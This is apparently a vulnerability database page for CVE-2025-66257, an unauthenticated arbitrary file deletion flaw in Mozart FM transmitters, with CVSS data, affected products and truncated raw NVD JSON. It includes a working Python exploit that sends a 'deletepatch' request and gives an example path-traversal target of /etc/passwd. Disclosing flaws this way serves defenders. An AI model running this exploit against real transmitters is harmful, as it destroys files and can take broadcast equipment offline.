CVE-2025-66257

Description

Unauthenticated Arbitrary File Deletion (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deletepatch parameter allows unauthenticated deletion of arbitrary files. The `deletepatch` parameter in `patch_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/patch/` directory without sanitization or access control checks.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:* - NOT VULNERABLE

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-66257 PoC - Mozart FM Transmitter Unauthenticated Arbitrary File Deletion
Note: This PoC is for educational and authorized security testing purposes only.
"""

import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit_file_deletion(target_url, file_to_delete):
    """
    Exploit the arbitrary file deletion vulnerability in patch_contents.php
    
    Args:
        target_url: Base URL of the Mozart FM Transmitter web interface
        file_to_delete: Path to the file to delete (relative to /var/www/patch/)
    
    Returns:
        bool: True if deletion appears successful, False otherwise
    """
    # Target endpoint
    endpoint = f"{target_url.rstrip('/')}/patch_contents.php"
    
    # Payload construction - the vulnerable 'deletepatch' parameter
    payload = {
        'deletepatch': file_to_delete
    }
    
    print(f"[*] Target: {endpoint}")
    print(f"[*] File to delete: {file_to_delete}")
    
    try:
        # Send GET request with deletepatch parameter
        response = requests.get(endpoint, params=payload, verify=False, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)} bytes")
        
        # Check for indicators of successful deletion
        if response.status_code == 200:
            print("[+] Request completed - file may have been deleted")
            return True
        else:
            print("[-] Unexpected response")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def main():
    if len(sys.argv) < 3:
        print("Usage: python3 cve-2025-66257_poc.py <target_url> <file_to_delete>")
        print("Example: python3 cve-2025-66257_poc.py https://192.168.1.100 ../../../etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    
    print("="*60)
    print("CVE-2025-66257 PoC - Mozart FM Transmitter")
    print("Unauthenticated Arbitrary File Deletion")
    print("="*60)
    
    exploit_file_deletion(target, file_path)

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66257
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66257
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66257/
[4] VulDB https://vuldb.com/cve/CVE-2025-66257
[5] https://www.abdulmhsblog.com/posts/webfmvulns/
[6] https://www.abdulmhsblog.com/posts/webfmvulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66257", "sourceIdentifier": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "published": "2025-11-26T01:16:09.000", "lastModified": "2025-12-03T16:50:15.817", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated Arbitrary File Deletion (patch_contents.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform The deletepatch parameter allows unauthenticated deletion of arbitrary files.\nThe `deletepatch` parameter in `patch_contents.php` allows unauthenticated deletion of arbitrary files in `/var/www/patch/` directory without sanitization or access control checks."}], "metrics": {"cvssMetricV40": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2B25533-2EF5-4158-9505-1CD18463DB68"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7834E460-78EE-456A-84F7-0DECE004BD80"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3497F7E-0433-444B-A58A-A795C8833966"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDEB3E77-E3D8-4878-BBE3-74530F3469B4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A975C91C-59BD-44AC-9F67-0682CE173738"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "F30F6688-FCDA-4BA5-ABD9-0EB91CDF7631"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7B57D15-6192-4D68-9CC5-726E052E7DDD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA1C3BA1-3E25-474B-B2A4-97136D6287BA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0130D6C-CE17-4046-B0EB-0AD2DA7DC6AC"}]}, {"operator": "OR", " ... (truncated)